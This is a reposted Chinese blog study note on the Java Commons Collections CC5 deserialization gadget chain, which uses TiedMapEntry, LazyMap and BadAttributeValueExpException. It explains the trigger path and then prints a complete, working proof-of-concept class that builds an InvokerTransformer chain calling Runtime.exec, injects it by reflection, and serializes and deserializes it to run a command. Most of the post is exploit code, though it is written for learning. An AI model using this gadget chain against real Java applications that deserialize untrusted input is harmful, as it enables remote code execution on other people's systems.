devbox
AllinToyou
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

Java安全学习笔记--反序列化漏洞利用链CC5链_java cc5

作者:AllinToyou | 2024-06-09 15:54:33

java cc5

测试环境

jdk1.8(jdk8u71)

Commons Collections4.0

在jdk1.8的时候Annotationinvocation的readObject方法被改写,cc1链就不适用了,cc5链是基于Lazymap类在jdk1.8使用TiedMapEntry+BadAttributeValueExpException来触发LazyMap的get方法。 CC1LazyMap链

利用链核心

  1.     Transformer[] transformers=new Transformer[]{
  2.                 new ConstantTransformer(Runtime.class),
  3.                 new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
  4.                 new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null,new Object[0]}),
  5.                 new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
  6.         };
  7.         Transformer chainedTransformer=new ChainedTransformer(transformers);

TiedMapEntry类

toString()方法

  1.  public String toString() {
  2.         return this.getKey() + "=" + this.getValue();
  3.     }

getValue()方法

  1.  public V getValue() {
  2.         return this.map.get(this.key);
  3.     }

hashCode()方法

  1.    public int hashCode() {
  2.         Object value = this.getValue();
  3.         return (this.getKey() == null ? 0 : this.getKey().hashCode()) ^ (value == null ? 0 : value.hashCode());
  4.     }

 构造方法

  1.    public TiedMapEntry(Map<K, V> map, K key) {
  2.         this.map = map;
  3.         this.key = key;
  4.     }

toString会触发getValue,getValue又会触发get函数,而通过构造函数可以将LazyMap赋值给this.map,这里还有另外一个方法hashCode方法也可以触发getValue这是cc6链中的后面再说。

  1. private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
  2.         ObjectInputStream.GetField gf = ois.readFields();
  3.         Object valObj = gf.get("val", null);
  4.  
  5.         if (valObj == null) {
  6.             val = null;
  7.         } else if (valObj instanceof String) {
  8.             val= valObj;
  9.         } else if (System.getSecurityManager() == null
  10.                 || valObj instanceof Long
  11.                 || valObj instanceof Integer
  12.                 || valObj instanceof Float
  13.                 || valObj instanceof Double
  14.                 || valObj instanceof Byte
  15.                 || valObj instanceof Short
  16.                 || valObj instanceof Boolean) {
  17.             val = valObj.toString();
  18.         } else { // the serialized object is from a version without JDK-8019292 fix
  19.             val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
  20.         }
  21.     }

接下来就是在BadAttributeExpValueException的readObject方法中触发toString,这里valObj是可控的,我们可以通过反射将TiedMapEntry传入。

编写POC

  1. import com.sun.xml.internal.messaging.saaj.soap.ver1_1.FaultElement1_1Impl;
  2. import org.apache.commons.collections4.Transformer;
  3. import org.apache.commons.collections4.functors.ChainedTransformer;
  4. import org.apache.commons.collections4.functors.ConstantTransformer;
  5. import org.apache.commons.collections4.functors.InvokerTransformer;
  6. import org.apache.commons.collections4.keyvalue.TiedMapEntry;
  7. import org.apache.commons.collections4.map.LazyMap;
  8.  
  9. import javax.management.BadAttributeValueExpException;
  10. import java.io.ByteArrayInputStream;
  11. import java.io.ByteArrayOutputStream;
  12. import java.io.ObjectInputStream;
  13. import java.io.ObjectOutputStream;
  14. import java.lang.reflect.Field;
  15. import java.util.HashMap;
  16. import java.util.Map;
  17.  
  18. public class CC5Poc {
  19.     public static void main(String[] args) throws  Exception{
  20.         Transformer[] transformers=new Transformer[]{
  21.                 new ConstantTransformer(Runtime.class),
  22.                 new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
  23.                 new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null,new Object[0]}),
  24.                 new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
  25.         };
  26.         Transformer chainedTransformer=new ChainedTransformer(transformers);
  27.         Map lazyMap=LazyMap.lazyMap(new HashMap(),chainedTransformer);
  28.         TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,"asd");
  29.         BadAttributeValueExpException badAttributeValueExpException=new BadAttributeValueExpException("asd");
  30.         Field field=badAttributeValueExpException.getClass().getDeclaredField("val");
  31.         field.setAccessible(true);
  32.         field.set(badAttributeValueExpException,tiedMapEntry);
  33.         //反射赋值
  34.  
  35.         ByteArrayOutputStream byteArrayOutputStream=new ByteArrayOutputStream();
  36.         ObjectOutputStream objectOutputStream=new ObjectOutputStream(byteArrayOutputStream);
  37.         objectOutputStream.writeObject(badAttributeValueExpException);
  38.         objectOutputStream.close();
  39.         //序列化
  40.         ByteArrayInputStream byteArrayInputStream=new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
  41.         ObjectInputStream objectInputStream=new ObjectInputStream(byteArrayInputStream);
  42.         objectInputStream.readObject();
  43.     }
  44. }

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/AllinToyou/article/detail/694802
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号